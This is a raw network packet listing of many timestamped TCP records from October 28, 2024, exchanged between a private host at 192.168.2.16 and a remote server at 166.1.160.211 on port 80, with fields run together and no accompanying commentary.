                                                                                                                                                              Oct 28, 2024 19:46:20.656181097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.656232119 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.656234026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.656269073 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.656303883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.656316996 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.656344891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.656378984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.656394958 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.656414032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.656447887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.656464100 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.656482935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.656517029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.656536102 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.656557083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.656593084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.656610966 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.657176018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.657211065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.657229900 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.657243967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.657279015 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.657289028 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.657314062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.657347918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.657356024 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.657381058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.657414913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.657424927 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.657449007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.657481909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.657490969 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.657516956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.657552958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.657565117 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.657587051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.657629967 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.658159971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.658195019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.658229113 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.658250093 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.658266068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.658299923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.658307076 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.658334970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.658368111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.658397913 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.658401966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.658436060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.658447981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.658472061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.658505917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.658518076 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.658540964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.658576012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.658591032 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.659008026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659043074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659060001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.659079075 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659112930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659127951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.659146070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659183025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659199953 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.659215927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659250021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659272909 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.659286022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659347057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659349918 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.659600019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659635067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659651041 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.659670115 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659719944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659732103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.659754992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659790039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659796953 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.659823895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659858942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659874916 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.659894943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659929991 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.659934998 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.659964085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.660001040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.660006046 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.660032988 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.660079956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.858648062 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.865143061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.865206003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.865241051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.865278959 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.865375996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.865410089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.865431070 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.865456104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.865490913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.865509987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.865621090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.865653038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.865672112 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.865686893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.865722895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.865737915 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.865837097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.865869999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.865899086 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.865950108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.865984917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866003036 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.866019011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866053104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866080046 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.866086960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866122007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866146088 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.866157055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866214037 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.866667032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866700888 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866733074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866750002 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.866767883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866801977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866835117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866838932 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.866869926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866883039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.866904020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866938114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866961002 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.866971016 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867007017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867029905 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.867039919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867074013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867110014 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.867557049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867592096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867610931 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.867626905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867660046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867682934 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.867693901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867728949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867750883 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.867762089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867795944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867811918 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.867829084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867865086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867880106 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.867898941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867932081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867940903 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.867968082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868021965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.868393898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868463993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868496895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868509054 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.868530989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868565083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868582964 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.868599892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868633032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868654013 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.868665934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868699074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868714094 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.868732929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868766069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868779898 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.868799925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868834019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868848085 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.868875980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868920088 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.869316101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.869350910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.869384050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.869399071 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.869417906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.869452000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.869462967 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.869487047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.869519949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.869529963 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.869556904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.869604111 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.967561960 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.973232985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973280907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973334074 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.973337889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973391056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973436117 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.973440886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973475933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973510027 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973520041 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.973639965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973675013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973686934 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.973807096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973855019 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.973859072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973892927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973941088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973947048 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.973977089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974010944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974028111 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.974045992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974080086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974109888 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.974114895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974149942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974164009 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.974478006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974512100 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974523067 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.974564075 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974597931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974607944 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.974632025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974668980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974684000 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.974703074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974736929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974754095 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.974771976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974818945 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.974822998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.975286961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.975341082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.975342989 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.975375891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.975409985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.975428104 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.975442886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.975476980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.975491047 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.975509882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.975544930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.975562096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.975579023 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.975610971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.975619078 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.975646019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.975678921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.975697041 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.975713968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.975763083 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.976167917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.976210117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.976264954 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.976268053 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.976301908 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.976336002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.976356030 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.976370096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.976408005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.976429939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.976443052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.976478100 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.976488113 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.976511955 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.976546049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.976556063 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.976578951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.976613045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.976627111 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.976646900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.976692915 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.977153063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.977186918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.977221012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.977237940 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.977255106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.977289915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.977300882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.977324963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.977358103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.977370024 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.977394104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.977427959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.977443933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.977462053 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.977494955 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.977510929 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.977530003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.977564096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.977580070 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.977988005 CET8049726166.1.160.211192.168.2.16
